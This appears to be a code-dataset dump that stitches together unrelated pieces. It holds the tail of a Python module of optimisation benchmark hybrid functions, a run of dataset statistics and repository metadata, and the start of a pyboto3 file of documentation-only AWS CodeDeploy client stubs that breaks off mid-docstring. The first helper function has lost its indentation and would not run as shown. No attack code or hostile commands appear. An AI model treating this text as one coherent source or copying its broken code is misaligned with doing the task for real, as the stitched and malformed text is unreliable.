partitions (list): List of percentages. Assumed to add up to 1.0.
Returns:
(list of arrays): The partitions of x after shuffling.
"""
nx = len(x)
# shuffle
xs = np.zeros(x.shape)
for i in range(0, nx):
xs[i] = x[shuffle[i]]
# and partition
parts = []
start, end = 0, 0
for p in partitions[:-1]:
end = start + int(np.ceil(p * nx))
parts.append(xs[start:end])
start = end
parts.append(xs[end:])
return parts
def f11(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 1 (N=3)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][10] if rotation is None else rotation
    shift = transforms.shifts[10][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][0] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2, 0.4, 0.4])
    components = (basic.zakharov, basic.rosenbrock, basic.rastrigin)
    return 1100.0 + sum(f(c) for f, c in zip(components, chunks))
def f12(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 2 (N=3)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][11] if rotation is None else rotation
    shift = transforms.shifts[11][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][1] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.3, 0.3, 0.4])
    components = (basic.high_conditioned_elliptic,
                  basic.modified_schwefel,
                  basic.bent_cigar)
    return 1200.0 + sum(f(c) for f, c in zip(components, chunks))
def f13(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 3 (N=3)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][12] if rotation is None else rotation
    shift = transforms.shifts[12][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][2] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.3, 0.3, 0.4])
    components = (basic.bent_cigar,
                  basic.rosenbrock,
                  basic.lunacek_bi_rastrigin)
    return 1300.0 + sum(f(c) for f, c in zip(components, chunks))
def f14(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 4 (N=4)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][13] if rotation is None else rotation
    shift = transforms.shifts[13][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][3] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2, 0.2, 0.2, 0.4])
    components = (basic.high_conditioned_elliptic,
                  basic.ackley,
                  basic.schaffers_f7,
                  basic.rastrigin)
    return 1400.0 + sum(f(c) for f, c in zip(components, chunks))
def f15(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 5 (N=4)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][14] if rotation is None else rotation
    shift = transforms.shifts[14][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][4] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2, 0.2, 0.3, 0.3])
    components = (basic.bent_cigar,
                  basic.h_g_bat,
                  basic.rastrigin,
                  basic.rosenbrock)
    return 1500.0 + sum(f(c) for f, c in zip(components, chunks))
def f16(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 6 (N=4)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][15] if rotation is None else rotation
    shift = transforms.shifts[15][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][5] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2, 0.2, 0.3, 0.3])
    components = (basic.expanded_schaffers_f6,
                  basic.h_g_bat,
                  basic.rosenbrock,
                  basic.modified_schwefel)
    return 1600.0 + sum(f(c) for f, c in zip(components, chunks))
def f17(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 7 (N=5)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][16] if rotation is None else rotation
    shift = transforms.shifts[16][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][6] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.1, 0.2, 0.2, 0.2, 0.3])
    components = (basic.katsuura,
                  basic.ackley,
                  basic.expanded_griewanks_plus_rosenbrock,
                  basic.modified_schwefel,
                  basic.rastrigin)
    return 1700.0 + sum(f(c) for f, c in zip(components, chunks))
def f18(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 8 (N=5)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][17] if rotation is None else rotation
    shift = transforms.shifts[17][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][7] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2] * 5)
    components = (basic.high_conditioned_elliptic,
                  basic.ackley,
                  basic.rastrigin,
                  basic.h_g_bat,
                  basic.discus)
    return 1800.0 + sum(f(c) for f, c in zip(components, chunks))
def f19(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 9 (N=5)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][18] if rotation is None else rotation
    shift = transforms.shifts[18][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][8] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.2] * 5)
    components = (basic.bent_cigar,
                  basic.rastrigin,
                  basic.expanded_griewanks_plus_rosenbrock,
                  basic.weierstrass,
                  basic.expanded_schaffers_f6)
    return 1900.0 + sum(f(c) for f, c in zip(components, chunks))
def f20(x, rotation=None, shift=None, shuffle=None):
    """
    Hybrid Function 10 (N=6)

    Args:
        x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
        rotation (matrix): Optional rotation matrix. If None (default), the
            official matrix from the benchmark suite will be used.
        shift (array): Optional shift vector. If None (default), the official
            vector from the benchmark suite will be used.
        shuffle (array): Optional shuffle vector. If None (default), the
            official permutation vector from the benchmark suite will be used.
    """
    nx = len(x)
    # fall back to the official benchmark transforms when not supplied
    rotation = transforms.rotations[nx][19] if rotation is None else rotation
    shift = transforms.shifts[19][:nx] if shift is None else shift
    shuffle = transforms.shuffles[nx][9] if shuffle is None else shuffle
    z = np.matmul(rotation, x - shift)
    chunks = _shuffle_and_partition(z, shuffle, [0.1, 0.1, 0.2, 0.2, 0.2, 0.2])
    components = (basic.happy_cat,
                  basic.katsuura,
                  basic.ackley,
                  basic.rastrigin,
                  basic.modified_schwefel,
                  basic.schaffers_f7)
    return 2000.0 + sum(f(c) for f, c in zip(components, chunks))
# All hybrid functions, f11 through f20, in benchmark order.
all_functions = [f11, f12, f13, f14, f15, f16, f17, f18, f19, f20]
| 35.931818
| 92
| 0.636543
| 1,827
| 12,648
| 4.329502
| 0.085933
| 0.039444
| 0.049305
| 0.060683
| 0.898736
| 0.874083
| 0.85689
| 0.812516
| 0.806068
| 0.675727
| 0
| 0.045093
| 0.254823
| 12,648
| 351
| 93
| 36.034188
| 0.794164
| 0.431847
| 0
| 0.438889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061111
| false
| 0
| 0.016667
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
81faa7648be2638616b6a6c23b8edce7bbbe3291
| 97,150
|
py
|
Python
|
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/codedeploy.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_tags_to_on_premises_instances(tags=None, instanceNames=None):
    """
    Adds tags to on-premises instances.
    See also: AWS API Documentation
    :example: response = client.add_tags_to_on_premises_instances(
        tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        instanceNames=[
            'string',
        ]
    )
    :type tags: list
    :param tags: [REQUIRED]
    The tag key-value pairs to add to the on-premises instances.
    Keys and values are both required. Keys cannot be null or empty strings. Value-only tags are not allowed.
    (dict) --Information about a tag.
    Key (string) --The tag's key.
    Value (string) --The tag's value.
    :type instanceNames: list
    :param instanceNames: [REQUIRED]
    The names of the on-premises instances to which to add tags.
    (string) --
    """
    # Documentation stub: the body intentionally does nothing.
    pass
def batch_get_application_revisions(applicationName=None, revisions=None):
    """
    Gets information about one or more application revisions.
    See also: AWS API Documentation
    :example: response = client.batch_get_application_revisions(
        applicationName='string',
        revisions=[
            {
                'revisionType': 'S3'|'GitHub',
                's3Location': {
                    'bucket': 'string',
                    'key': 'string',
                    'bundleType': 'tar'|'tgz'|'zip',
                    'version': 'string',
                    'eTag': 'string'
                },
                'gitHubLocation': {
                    'repository': 'string',
                    'commitId': 'string'
                }
            },
        ]
    )
    :type applicationName: string
    :param applicationName: [REQUIRED]
    The name of an AWS CodeDeploy application about which to get revision information.
    :type revisions: list
    :param revisions: [REQUIRED]
    Information to get about the application revisions, including type and location.
    (dict) --Information about the location of an application revision.
    revisionType (string) --The type of application revision:
    S3: An application revision stored in Amazon S3.
    GitHub: An application revision stored in GitHub.
    s3Location (dict) --Information about the location of application artifacts stored in Amazon S3.
    bucket (string) --The name of the Amazon S3 bucket where the application revision is stored.
    key (string) --The name of the Amazon S3 object that represents the bundled artifacts for the application revision.
    bundleType (string) --The file type of the application revision. Must be one of the following:
    tar: A tar archive file.
    tgz: A compressed tar archive file.
    zip: A zip archive file.
    version (string) --A specific version of the Amazon S3 object that represents the bundled artifacts for the application revision.
    If the version is not specified, the system will use the most recent version by default.
    eTag (string) --The ETag of the Amazon S3 object that represents the bundled artifacts for the application revision.
    If the ETag is not specified as an input parameter, ETag validation of the object will be skipped.
    gitHubLocation (dict) --Information about the location of application artifacts stored in GitHub.
    repository (string) --The GitHub account and repository pair that stores a reference to the commit that represents the bundled artifacts for the application revision.
    Specified as account/repository.
    commitId (string) --The SHA1 commit ID of the GitHub commit that represents the bundled artifacts for the application revision.
    :rtype: dict
    :return: {
        'applicationName': 'string',
        'errorMessage': 'string',
        'revisions': [
            {
                'revisionLocation': {
                    'revisionType': 'S3'|'GitHub',
                    's3Location': {
                        'bucket': 'string',
                        'key': 'string',
                        'bundleType': 'tar'|'tgz'|'zip',
                        'version': 'string',
                        'eTag': 'string'
                    },
                    'gitHubLocation': {
                        'repository': 'string',
                        'commitId': 'string'
                    }
                },
                'genericRevisionInfo': {
                    'description': 'string',
                    'deploymentGroups': [
                        'string',
                    ],
                    'firstUsedTime': datetime(2015, 1, 1),
                    'lastUsedTime': datetime(2015, 1, 1),
                    'registerTime': datetime(2015, 1, 1)
                }
            },
        ]
    }
    :returns:
    S3: An application revision stored in Amazon S3.
    GitHub: An application revision stored in GitHub.
    """
    # Documentation stub: the body intentionally does nothing.
    pass
def batch_get_applications(applicationNames=None):
    """
    Gets information about one or more applications.
    See also: AWS API Documentation
    :example: response = client.batch_get_applications(
        applicationNames=[
            'string',
        ]
    )
    :type applicationNames: list
    :param applicationNames: A list of application names separated by spaces.
    (string) --
    :rtype: dict
    :return: {
        'applicationsInfo': [
            {
                'applicationId': 'string',
                'applicationName': 'string',
                'createTime': datetime(2015, 1, 1),
                'linkedToGitHub': True|False,
                'gitHubAccountName': 'string'
            },
        ]
    }
    """
    # Documentation stub: the body intentionally does nothing.
    pass
def batch_get_deployment_groups(applicationName=None, deploymentGroupNames=None):
    """
    Gets information about one or more deployment groups.
    See also: AWS API Documentation
    :example: response = client.batch_get_deployment_groups(
        applicationName='string',
        deploymentGroupNames=[
            'string',
        ]
    )
    :type applicationName: string
    :param applicationName: [REQUIRED]
    The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
    :type deploymentGroupNames: list
    :param deploymentGroupNames: [REQUIRED]
    The deployment groups' names.
    (string) --
    :rtype: dict
    :return: {
        'deploymentGroupsInfo': [
            {
                'applicationName': 'string',
                'deploymentGroupId': 'string',
                'deploymentGroupName': 'string',
                'deploymentConfigName': 'string',
                'ec2TagFilters': [
                    {
                        'Key': 'string',
                        'Value': 'string',
                        'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
                    },
                ],
                'onPremisesInstanceTagFilters': [
                    {
                        'Key': 'string',
                        'Value': 'string',
                        'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
                    },
                ],
                'autoScalingGroups': [
                    {
                        'name': 'string',
                        'hook': 'string'
                    },
                ],
                'serviceRoleArn': 'string',
                'targetRevision': {
                    'revisionType': 'S3'|'GitHub',
                    's3Location': {
                        'bucket': 'string',
                        'key': 'string',
                        'bundleType': 'tar'|'tgz'|'zip',
                        'version': 'string',
                        'eTag': 'string'
                    },
                    'gitHubLocation': {
                        'repository': 'string',
                        'commitId': 'string'
                    }
                },
                'triggerConfigurations': [
                    {
                        'triggerName': 'string',
                        'triggerTargetArn': 'string',
                        'triggerEvents': [
                            'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
                        ]
                    },
                ],
                'alarmConfiguration': {
                    'enabled': True|False,
                    'ignorePollAlarmFailure': True|False,
                    'alarms': [
                        {
                            'name': 'string'
                        },
                    ]
                },
                'autoRollbackConfiguration': {
                    'enabled': True|False,
                    'events': [
                        'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
                    ]
                },
                'deploymentStyle': {
                    'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
                    'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
                },
                'blueGreenDeploymentConfiguration': {
                    'terminateBlueInstancesOnDeploymentSuccess': {
                        'action': 'TERMINATE'|'KEEP_ALIVE',
                        'terminationWaitTimeInMinutes': 123
                    },
                    'deploymentReadyOption': {
                        'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
                        'waitTimeInMinutes': 123
                    },
                    'greenFleetProvisioningOption': {
                        'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
                    }
                },
                'loadBalancerInfo': {
                    'elbInfoList': [
                        {
                            'name': 'string'
                        },
                    ]
                },
                'lastSuccessfulDeployment': {
                    'deploymentId': 'string',
                    'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
                    'endTime': datetime(2015, 1, 1),
                    'createTime': datetime(2015, 1, 1)
                },
                'lastAttemptedDeployment': {
                    'deploymentId': 'string',
                    'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
                    'endTime': datetime(2015, 1, 1),
                    'createTime': datetime(2015, 1, 1)
                }
            },
        ],
        'errorMessage': 'string'
    }
    :returns:
    KEY_ONLY: Key only.
    VALUE_ONLY: Value only.
    KEY_AND_VALUE: Key and value.
    """
    # Documentation stub: the body intentionally does nothing.
    pass
def batch_get_deployment_instances(deploymentId=None, instanceIds=None):
    """
    Gets information about one or more instances that are part of a
    deployment group.

    See also: AWS API Documentation

    :example: response = client.batch_get_deployment_instances(
        deploymentId='string',
        instanceIds=['string']
    )
    :type deploymentId: string
    :param deploymentId: [REQUIRED] The unique ID of a deployment.
    :type instanceIds: list
    :param instanceIds: [REQUIRED] The unique IDs of instances in the
        deployment group. (string) --
    :rtype: dict
    :return: A dict with an ``instancesSummary`` list (one entry per
        instance: ``deploymentId``, ``instanceId``, ``status`` of
        'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'|'Ready',
        ``lastUpdatedAt``, ``lifecycleEvents`` with per-event ``diagnostics``,
        timestamps and status, and ``instanceType`` of 'Blue'|'Green') plus
        an ``errorMessage`` string. See the AWS API documentation for the
        full response shape.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def batch_get_deployments(deploymentIds=None):
    """
    Gets information about one or more deployments.

    See also: AWS API Documentation

    :example: response = client.batch_get_deployments(
        deploymentIds=['string']
    )
    :type deploymentIds: list
    :param deploymentIds: A list of deployment IDs, separated by spaces.
        (string) --
    :rtype: dict
    :return: A dict with a ``deploymentsInfo`` list. Each entry describes one
        deployment: application/group/config names, ``deploymentId``,
        ``previousRevision`` and ``revision`` (each a revision location with
        ``revisionType`` 'S3'|'GitHub' and the matching ``s3Location`` or
        ``gitHubLocation``), ``status``, ``errorInformation``, create/start/
        complete timestamps, a ``deploymentOverview`` of per-state instance
        counts, ``creator``, rollback and deployment-style settings,
        ``targetInstances``, blue/green configuration, ``loadBalancerInfo``,
        and ``fileExistsBehavior``. See the AWS API documentation for the
        full response shape.
    :returns:
        S3: An application revision stored in Amazon S3.
        GitHub: An application revision stored in GitHub.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def batch_get_on_premises_instances(instanceNames=None):
    """
    Gets information about one or more on-premises instances.

    See also: AWS API Documentation

    :example: response = client.batch_get_on_premises_instances(
        instanceNames=['string']
    )
    :type instanceNames: list
    :param instanceNames: The names of the on-premises instances about which
        to get information. (string) --
    :rtype: dict
    :return: A dict with an ``instanceInfos`` list; each entry contains
        ``instanceName``, ``iamSessionArn``, ``iamUserArn``, ``instanceArn``,
        ``registerTime``, ``deregisterTime``, and a ``tags`` list of
        Key/Value pairs.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def can_paginate(operation_name=None):
    """
    Check whether a client operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name, identical to the method name
        on the client. For example, if the method name is ``create_foo`` and
        you would normally invoke the operation as
        ``client.create_foo(**kwargs)``, then — provided the operation is
        pageable — ``client.get_paginator('create_foo')`` is available.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def continue_deployment(deploymentId=None):
    """
    For a blue/green deployment, starts the process of rerouting traffic from
    instances in the original environment to instances in the replacement
    environment without waiting for a specified wait time to elapse.
    (Traffic rerouting, which is achieved by registering instances in the
    replacement environment with the load balancer, can start as soon as all
    instances have a status of Ready.)

    See also: AWS API Documentation

    :example: response = client.continue_deployment(
        deploymentId='string'
    )
    :type deploymentId: string
    :param deploymentId: The deployment ID of the blue/green deployment for
        which you want to start rerouting traffic to the replacement
        environment.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def create_application(applicationName=None):
    """
    Creates an application.

    See also: AWS API Documentation

    :example: response = client.create_application(
        applicationName='string'
    )
    :type applicationName: string
    :param applicationName: [REQUIRED] The name of the application. This name
        must be unique with the applicable IAM user or AWS account.
    :rtype: dict
    :return: {'applicationId': 'string'}
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def create_deployment(applicationName=None, deploymentGroupName=None, revision=None, deploymentConfigName=None, description=None, ignoreApplicationStopFailures=None, targetInstances=None, autoRollbackConfiguration=None, updateOutdatedInstancesOnly=None, fileExistsBehavior=None):
    """
    Deploys an application revision through the specified deployment group.

    See also: AWS API Documentation

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.
    :type deploymentGroupName: string
    :param deploymentGroupName: The name of the deployment group.
    :type revision: dict
    :param revision: The type and location of the revision to deploy:
        ``revisionType`` of 'S3' or 'GitHub', plus the matching
        ``s3Location`` (bucket, key, bundleType 'tar'|'tgz'|'zip', optional
        version and eTag) or ``gitHubLocation`` (repository as
        account/repository, commitId).
    :type deploymentConfigName: string
    :param deploymentConfigName: The name of a deployment configuration
        associated with the applicable IAM user or AWS account. If not
        specified, the deployment group's configuration is used; failing
        that, CodeDeployDefault.OneAtATime is the default.
    :type description: string
    :param description: A comment about the deployment.
    :type ignoreApplicationStopFailures: boolean
    :param ignoreApplicationStopFailures: If true, a failed ApplicationStop
        lifecycle event on an instance does not fail the deployment to that
        instance; the deployment continues to the BeforeInstall event. If
        false or unspecified, an ApplicationStop failure stops and fails the
        deployment to that instance.
    :type targetInstances: dict
    :param targetInstances: Information about the instances that will belong
        to the replacement environment in a blue/green deployment:
        ``tagFilters`` (list of Key/Value/Type dicts, Type one of
        'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE') and ``autoScalingGroups``
        (list of group names).
    :type autoRollbackConfiguration: dict
    :param autoRollbackConfiguration: Configuration information for an
        automatic rollback added when the deployment is created: ``enabled``
        (boolean) and ``events`` (list of rollback-triggering event types).
    :type updateOutdatedInstancesOnly: boolean
    :param updateOutdatedInstancesOnly: Indicates whether to deploy to all
        instances or only to instances that are not running the latest
        application revision.
    :type fileExistsBehavior: string
    :param fileExistsBehavior: How AWS CodeDeploy handles files that already
        exist in a deployment target location but weren't part of the
        previous successful deployment:
        DISALLOW (fail; the default), OVERWRITE (replace with the revision's
        file), or RETAIN (keep the existing file).
    :rtype: dict
    :return: {'deploymentId': 'string'}
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def create_deployment_config(deploymentConfigName=None, minimumHealthyHosts=None):
    """
    Creates a deployment configuration.

    See also: AWS API Documentation

    :example: response = client.create_deployment_config(
        deploymentConfigName='string',
        minimumHealthyHosts={
            'value': 123,
            'type': 'HOST_COUNT'|'FLEET_PERCENT'
        }
    )
    :type deploymentConfigName: string
    :param deploymentConfigName: [REQUIRED] The name of the deployment
        configuration to create.
    :type minimumHealthyHosts: dict
    :param minimumHealthyHosts: The minimum number of healthy instances that
        should be available at any time during the deployment. Expects
        ``type`` and ``value``:
        HOST_COUNT means ``value`` is an absolute minimum number of healthy
        instances; FLEET_PERCENT means ``value`` is a percentage of the
        total number of instances (CodeDeploy converts the percentage to an
        instance count at deployment start, rounding up fractions). For
        example, for a 95% healthy minimum, use type FLEET_PERCENT and
        value 95.
        value (integer) --The minimum healthy instance value.
        type (string) --The minimum healthy instance type.
        Note: in a call to the get deployment configuration operation,
        CodeDeployDefault.OneAtATime reports a type of MOST_CONCURRENCY and
        a value of 1 — you cannot set MOST_CONCURRENCY yourself. See AWS
        CodeDeploy Instance Health in the AWS CodeDeploy User Guide.
    :rtype: dict
    :return: {'deploymentConfigId': 'string'}
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def create_deployment_group(applicationName=None, deploymentGroupName=None, deploymentConfigName=None, ec2TagFilters=None, onPremisesInstanceTagFilters=None, autoScalingGroups=None, serviceRoleArn=None, triggerConfigurations=None, alarmConfiguration=None, autoRollbackConfiguration=None, deploymentStyle=None, blueGreenDeploymentConfiguration=None, loadBalancerInfo=None):
    """
    Creates a deployment group to which application revisions will be
    deployed.

    See also: AWS API Documentation

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.
    :type deploymentGroupName: string
    :param deploymentGroupName: [REQUIRED] The name of a new deployment group
        for the specified application.
    :type deploymentConfigName: string
    :param deploymentConfigName: Either one of the predefined configurations
        provided with AWS CodeDeploy or a custom configuration created via
        the create deployment configuration operation.
        CodeDeployDefault.OneAtATime is the default when none is specified.
        See Working with Deployment Groups in the AWS CodeDeploy User Guide.
    :type ec2TagFilters: list
    :param ec2TagFilters: The Amazon EC2 tags on which to filter; the group
        includes EC2 instances with any of the specified tags. Each entry is
        a dict of Key, Value, and Type
        ('KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE').
    :type onPremisesInstanceTagFilters: list
    :param onPremisesInstanceTagFilters: The on-premises instance tags on
        which to filter; same Key/Value/Type structure as ``ec2TagFilters``.
    :type autoScalingGroups: list
    :param autoScalingGroups: A list of associated Auto Scaling groups.
        (string) --
    :type serviceRoleArn: string
    :param serviceRoleArn: [REQUIRED] A service role ARN that allows AWS
        CodeDeploy to act on the user's behalf when interacting with AWS
        services.
    :type triggerConfigurations: list
    :param triggerConfigurations: Notification triggers to create with the
        group. Each entry has ``triggerName``, ``triggerTargetArn`` (an
        Amazon SNS topic ARN), and ``triggerEvents`` (the deployment or
        instance event types that fire the trigger). For examples, see
        Create a Trigger for an AWS CodeDeploy Event in the User Guide.
    :type alarmConfiguration: dict
    :param alarmConfiguration: Amazon CloudWatch alarm settings: ``enabled``
        (boolean), ``ignorePollAlarmFailure`` (boolean; if true the
        deployment proceeds even when alarm state cannot be retrieved —
        default false), and ``alarms`` (up to 10 dicts with a unique alarm
        ``name`` of at most 255 characters).
    :type autoRollbackConfiguration: dict
    :param autoRollbackConfiguration: Automatic-rollback settings added when
        the group is created: ``enabled`` (boolean) and ``events`` (list of
        rollback-triggering event types).
    :type deploymentStyle: dict
    :param deploymentStyle: ``deploymentType`` ('IN_PLACE'|'BLUE_GREEN') and
        ``deploymentOption``
        ('WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL').
    :type blueGreenDeploymentConfiguration: dict
    :param blueGreenDeploymentConfiguration: Blue/green options:
        ``terminateBlueInstancesOnDeploymentSuccess`` (action
